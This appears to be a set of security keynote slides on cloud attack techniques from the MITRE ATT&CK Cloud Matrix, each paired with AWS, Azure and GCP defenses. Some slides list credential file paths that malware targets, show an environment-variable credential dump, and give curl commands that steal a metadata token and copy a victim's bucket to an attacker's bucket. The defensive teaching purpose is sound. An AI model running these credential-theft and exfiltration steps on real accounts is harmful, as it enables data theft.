Organizations are moving data and applications into public cloud services at a rapid pace. As the public cloud footprint expands, red teams and attackers are reinventing the kill chain in the cloud. Public cloud services provide new, creative ways to discover assets, compromise credentials, move laterally, and exfiltrate data. In this keynote, we explore common techniques from the MITRE ATT&CK Cloud Matrix. For each technique, attendees will analyze misconfigurations, exploitation paths, and common architecture patterns for breaking the kill chain.
7. MITRE ATT&CK T1580: Discovering infrastructure and
resources misconfigured for public cloud access:
Cloud Infrastructure Discovery
7
• Storage buckets
• Big data sets / databases
• Container image repositories
• Secrets and cryptographic keys
• Virtual machine image or database
snapshots
8. AWS Exposable Resources, by Scott Piper, contains a list of non-VPC
bound AWS resources that can also be exposed publicly:
AWS Publicly Exposable Resources
8
• S3 Bucket ACLs and public bucket policy
• EBS Volume Snapshots shared publicly
• EC2 Amazon Machine Images shared publicly
• ECR container image public repositories
• RDS Database and Cluster Snapshots
• SQS Queue public policy
• SNS notification topics public policy
• Lambda function URLs provided a dedicated HTTPS
endpoint
• More at https://github.com/SummitRoute/
aws_exposable_resources
9. Big Query Datasets support sharing with allUsers and
external cloud identity accounts:
BigQuery Public Datasets
9
10. 10
Azure Virtual Machines Disk Snapshots
• Sharable with other users
in the AD tenant
• Supports direct
downloads using SAS
tokens
• Provides a non-VNet
bound way to exfiltrate
snapshots
11. Defending against resource misconfiguration starts
with applying detective and preventative policies in
the resource hierarchy:
Breaking The Kill Chain: MITRE ATT&CK T1580
11
• Service Control Policy (SCP)
• Azure Policy
• Organization Policy
AWS
Azure
GCP
12. Service Control Policy (SCP) documents can attach to the root,
OU, and account level nodes in the AWS organization:
Breaking The Kill Chain: Cloud Resource Hierarchy
12
13. 13
Breaking The Kill Chain: Service Control Policies
{
"Statement": [
{
"Action": [
"s3:PutAccountPublicAccessBlock"
],
"Resource": "*",
"Effect": "Deny"
}
]
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Example SCPs blocking API calls to modify public S3 and Lambda
function URL configurations:
{
"Statement": [ {
"Action": [
"lambda:CreateFunctionUrlConfig",
"lambda:UpdateFunctionUrlConfig"
],
"Resource":
"arn:aws:arn:aws:lambda:*:*:function/*",
"Effect": "Deny",
"Condition": {
"StringNotEquals": {
"lambda:FunctionUrlAuthType": "AWS_IAM"
…
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15. MITRE ATT&CK T1522: Discovering insecurely stored
IAM and service account credentials:
Unsecured Credentials
15
Unsecured Credential Locations
Bash History Configuration Files Source Code
Version Control Instance Metadata Service Environment Variables
16. Attackers target credentials that map to many different
resource types across the cloud providers:
Cloud Credential Types
16
• IAM Users & Roles
• Service Principal & Managed
Identity
• Service Accounts
AWS IAM
Azure AD
Cloud Identity
17. Cloud-focused malware (e.g., TeamTNT) will focus on
common locations with cleartext credentials:
• ~/.aws/credentials
• ~/.azure/accessTokens.json
• ~/.config/gcloud/*credential*
• ~/.ssh/*
Configuration File Credentials
17
18. • Node Package Manager
• Scanned by Aidan Steele in
October 2021
• Identifies 117 valid API keys,
including 30 AWS root access
keys
• https://sec549.com/id259
Version Control and Package Managers
18
• Python Package Index (PyPI)
• Scanned by Tom Forbes in
January 2023
• Identifies 57 valid AWS API keys,
including 11 AWS root access
keys
• https://sec549.com/id260
19. 19
Environment Variable Credentials
env | grep 'AWS'
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g==
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther
AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a
AWS_DEFAULT_REGION=us-east-1
AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG
AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A
1
2
3
4
5
6
7
8
9
• Continuous Integration pipelines, containers, and functions often
have secrets stored in environment variables
• Local File Inclusion (LFI) and Command Injection vulnerabilities can
allow attackers to exfiltrate environment variables
27. MITRE ATT&CK T1046: Enumerating resources with public IP
addresses in the victim's cloud account:
Network Service Discovery
27
• VPC-bound resource types include:
• Virtual machines, load balancers, containers, datastores,
Redis clusters, data lakes
• Public cloud IP address blocks are well known
• Large scale cloud network service discovery
(e.g., Shodan, Nmap)
• Cloud Scanning For Vulnerability Discovery by
@joswr1ght
• https://sec510.com/1042
• Identify remotely exploitable hosts and software
28. EC2 instances created in the AWS Web Console auto-generate
a new security group with default open admin access:
• Linux VMs auto populate open SSH access
• Windows VMs auto populate open RDP access
AWS Default Virtual Machine Security Group
28
29. Azure Virtual Machines created in the UI default to open
admin access:
• Linux VMs auto-populate open SSH access
• Windows VMs auto-populate RDP access
Azure Default Virtual Machine Network Access
29
35. Breaking The Kill Chain: Centralized Resource Configurations
35
Centralizing network resources into the network host
account provides a single pane of glass for public
connectivity:
PUBLIC
INVENTORY
38. MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud
account by escalating privileges and transferring data on the
cloud provider's backbone network to avoid network-based
detection
Transfer Data to the Attacker's Cloud Account
38
• Compromising over permissioned service accounts
• Impersonating a target service account
• Transferring data across the cloud provider's backbone
network
• Pivoting with stolen credentials
39. 39
Privilege Escalation: Azure Overly Scoped Role Definition
{
"assignableScopes": [ "/subscriptions/${var.subscription_id}" ],
"permissions": [
{
"actions": [
"Microsoft.Storage/storageAccounts/listKeys/action",
"Microsoft.Storage/storageAccounts/ListAccountSas/action",
"Microsoft.Storage/storageAccounts/read"
],
}
],
"roleName": "Storage Access"
}
1
2
3
4
5
6
7
8
9
10
11
12
13
Example role definition allowing excessive permissions and
overly scoped access to resources:
SUBSCRIPTION-WIDE
SCOPE TO ALL
STORAGE ACCOUNTS
40. Google Cloud's Primitive Editor role has permission to view,
modify, and delete existing project resources (with a few
exceptions):
• Default role assigned to Compute instances, App Engine services,
and Cloud Functions
• Too permissive for what your workload needs in production
• Has over 4,000 assigned permissions on the project
• Attackers compromising workloads with Editor permissions can
access data across the project
Privilege Escalation: Google Cloud's Primitive Editor Role
40
41. Transitive privilege escalation occurs by creating a resource
that inherits permissions from a supplied service account:
• AWS: iam:PassRole permission
• GCP: iam.serviceAccounts.actAs permission
Privilege Escalation: Transitive Permission Assignment
41
Create a
Compute
Instance
Configure Compute
to Run as the target
service account
Obtain token through
the Instance Metadata
Server (IMDS)
Impersonate
Privileged Service
Account in Project
42. Attackers leverage private service
access (private link) to exfiltrate data
across the cloud provider's backbone
network:
• Private link services are designed to help
customers keep data from traversing the
Internet
• Default policy (AWS, GCP) allows multi-
tenant access to the cloud provider APIs
• May allow data to move cross-tenant
between resources without network and
firewall inspection
Data Exfiltration: Transferring Data Cross Tenant
42
43. 43
Data Exfiltration: Stolen Credential Pivoting
export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/
computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token)
# List all storage buckets in the victim's project
curl -s -H "Authorization: Bearer $BEARER_TOKEN"
"https://storage.googleapis.com/storage/v1/b?project=victims-project"
# Copy objects from the victim's bucket
curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN"
https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers-
bucket/o/data.pdf
1
2
3
4
5
6
7
8
9
10
11
Exfiltrating data from the victim's Google Cloud project using the
stolen credential:
44. Defending against privilege escalation and data
exfiltration requires additional cloud-native controls
to prevent data from leaving the organization's tenant:
Breaking The Kill Chain: MITRE ATT&CK T1537
44
• IAM Access Analyzer
• IAM Recommender
• Private Link Services
• Network Access Rules
• VPC Service Controls
AWS / GCP
AWS / Azure
Google Cloud
45. Breaking The Kill Chain: IAM Recommender
45
Reviewing IAM Recommender reports and reducing excessive
permissions:
46. Breaking The Kill Chain: Service Endpoint Configuration
46
Preventing data exfiltration with private link services and
network access policy:
47. Breaking The Kill Chain: VPC Service Controls
47
Configuring a VPC Service
Controls perimeter to prevent
data exfiltration:
• Perimeter includes the
authorized projects
• In-scope services include
the GCS storage service
• Unauthorized projects and
external clients cannot
interact with the target GCS
bucket
49. Breaking The Cloud Kill Chain requires an in-depth understanding
of cloud-native services and configurations:
Closing Remarks
Resources can be made public
too easily, build guardrails with
the policy hierarchy
Credential management
continues to be a problem, move
to workload identity federation
Cloud resources are Internet
exposed too easily, central network
inspection is critical
New ways to hide & exfiltrate
data exist, focus on building
network identity perimeters